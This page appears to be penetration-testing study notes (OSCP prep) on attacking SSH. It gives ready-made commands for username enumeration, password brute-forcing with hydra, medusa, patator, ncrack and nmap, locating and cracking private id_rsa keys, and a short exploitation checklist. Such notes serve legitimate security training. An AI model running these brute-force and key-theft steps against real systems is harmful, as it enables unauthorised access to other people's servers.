OSCP Notes
Search…
SSH

User enumeration

1
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
Copied!
1
nmap -sV -p T:22 $ip
Copied!

Vulnerable Versions

7.2p1

Connection

Connect to SSH

1
ssh <user name>@$ip
Copied!

Connect to SSH with private key

1
ssh –i key <user name>@$ip
Copied!

Brute-force

Patator

1
patator ssh_login host=$ip user=FILE0 0=user.txt password=FILE1 1=pass.txt
Copied!

Hydra

Known username
1
hydra -v -V -l root -P pass.txt $ip ssh
Copied!
Username and password attack
1
hydra -L user.txt -P pass.txt $ip ssh
Copied!

Medusa

1
medusa -h $ip -U user.txt -P pass.txt -M ssh
Copied!

Ncrack

1
ncrack –v –U user.txt –P pass.txt $ip:22
Copied!

Nmap

1
nmap -p 22 –script ssh-brute –script-args userdb=users.lst,passdb=pass.lst –script-args ssh-brute.timeout=4s $ip
Copied!

Path of id_rsa

1
$user/.ssh/id_rsa
2
$user/.ssh/authorized key
Copied!

Crack id_rsa

1
/usr/share/john/ssh2john.py
Copied!

Configuration files

1
ssh_config
2
sshd_config
3
authorized_keys
4
ssh_known_hosts
5
.shosts
Copied!

Exploitation

    Gather version numbers
    Searchsploit
    Default Creds
    Creds previously gathered
    Download the software
Last modified 1yr ago